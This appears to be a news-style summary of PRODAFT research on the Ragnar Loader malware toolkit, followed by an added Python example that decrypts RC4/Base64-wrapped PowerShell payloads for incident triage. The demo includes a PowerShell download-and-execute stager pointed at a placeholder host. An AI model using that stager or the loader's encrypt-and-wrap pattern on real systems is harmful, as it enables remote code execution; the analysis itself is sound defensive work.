Researchers have recently shed light on a sophisticated and evolving malware toolkit known as Ragnar Loader, which is utilized by various cybercrime and ransomware groups, including Ragnar Locker, FIN7, FIN8, and Ruthless Mantis.
According to Swiss cybersecurity company PRODAFT, “Ragnar Loader plays a crucial role in maintaining access to compromised systems, enabling attackers to sustain long-term operations within networks.”
While its exact ownership is unclear, it is believed that the developers of Ragnar Loader are continually updating the malware with new features, making it increasingly modular and difficult to detect.
Ragnar Loader, also referred to as Sardonic, was first identified by Bitdefender in August 2021 in connection with an unsuccessful attack carried out by FIN8 against a financial institution in the United States. It is believed to have been in use since 2020.
In July 2023, Symantec revealed that FIN8 had used an updated version of the backdoor to deliver the BlackCat ransomware.
The primary function of Ragnar Loader is to establish long-term footholds within targeted environments while employing various techniques to evade detection and maintain operational resilience.
According to PRODAFT, “The malware utilizes PowerShell-based payloads for execution, incorporates strong encryption and encoding methods, and employs sophisticated process injection strategies to establish and maintain stealthy control over compromised systems.”
These features collectively enhance its ability to evade detection and persist within targeted environments.
Ragnar Loader is offered to affiliates in the form of an archive file package containing multiple components to facilitate reverse shell, local privilege escalation, and remote desktop access.
It is designed to establish communications with the threat actor, allowing them to remotely control the infected system through a command-and-control (C2) panel.
Typically executed on victim systems using PowerShell, Ragnar Loader integrates various anti-analysis techniques to resist detection and obscure control flow logic.
Furthermore, it features the ability to conduct various backdoor operations by running DLL plugins and shellcode, as well as reading and exfiltrating the contents of arbitrary files.
To enable lateral movement within a network, the package includes a separate PowerShell-based pivoting script.
Another critical component is a Linux ELF executable named bc that facilitates remote connections, permitting the adversary to launch and execute command-line instructions directly on the compromised system.
According to PRODAFT, “It employs advanced obfuscation, encryption, and anti-analysis techniques, including PowerShell-based payloads, RC4 and Base64 decryption routines, dynamic process injection, token manipulation, and lateral movement capabilities.”
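The RC4-plus-Base64 layering named in that quote is a common pattern in PowerShell loaders, and the practical consequence for a responder is that a script's own decryption routine can be reproduced offline to recover the staged payload. The block below is an added example written for this page, not code from PRODAFT, Bitdefender, Symantec or the malware itself: it implements RC4, pulls Base64 runs out of a script body, decrypts each with a candidate key, and keeps only results that decode to readable text. The key, the embedded PowerShell stub, the loader skeleton and the 40-character blob threshold are all constructed for the demo and are not taken from any Ragnar Loader sample.

```python
import base64
import binascii
import re
from typing import Optional

# RC4 keystream XOR. The same routine encrypts and decrypts, which is why a
# loader's decryption step can be re-run verbatim during triage.
def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

# Runs of Base64 alphabet long enough to be a payload rather than an
# identifier. The 40-character floor is an assumption for this demo.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def extract_b64_blobs(script: str) -> list:
    return [m.group(0) for m in B64_RUN.finditer(script)]

def decode_layer(blob: str, key: bytes) -> Optional[bytes]:
    """Base64-decode a candidate blob, then strip the RC4 layer."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return rc4(key, raw)

def looks_like_text(data: bytes) -> bool:
    """Cheap plausibility check: a wrong key yields non-printable bytes."""
    return bool(data) and all(32 <= b < 127 or b in (9, 10, 13) for b in data)

def recover_payloads(script: str, key: bytes) -> list:
    found = []
    for blob in extract_b64_blobs(script):
        plain = decode_layer(blob, key)
        if plain is not None and looks_like_text(plain):
            found.append(plain)
    return found

# Constructed demo material, not from any real sample.
DEMO_KEY = b"constructed-demo-key"
DEMO_PAYLOAD = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"

def build_demo_script() -> str:
    """Build a toy loader: key in the clear, payload RC4-encrypted then Base64-wrapped."""
    blob = base64.b64encode(rc4(DEMO_KEY, DEMO_PAYLOAD)).decode("ascii")
    return (
        "$k=[Text.Encoding]::ASCII.GetBytes('constructed-demo-key')\n"
        f"$b=[Convert]::FromBase64String('{blob}')\n"
        "# ... RC4 over $b with $k, then IEX of the result ...\n"
    )

if __name__ == "__main__":
    for payload in recover_payloads(build_demo_script(), DEMO_KEY):
        print(payload.decode("ascii"))
```

In a real case the key is rarely a literal string next to the blob; it may be derived at runtime or supplied by the C2 panel, so the candidate-key loop in recover_payloads is where a responder would plug in keys pulled from memory or from the decryption routine itself. The plausibility check matters because RC4 gives no integrity error on a wrong key, only garbage.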
These features exemplify the increasing complexity and adaptability of modern ransomware ecosystems.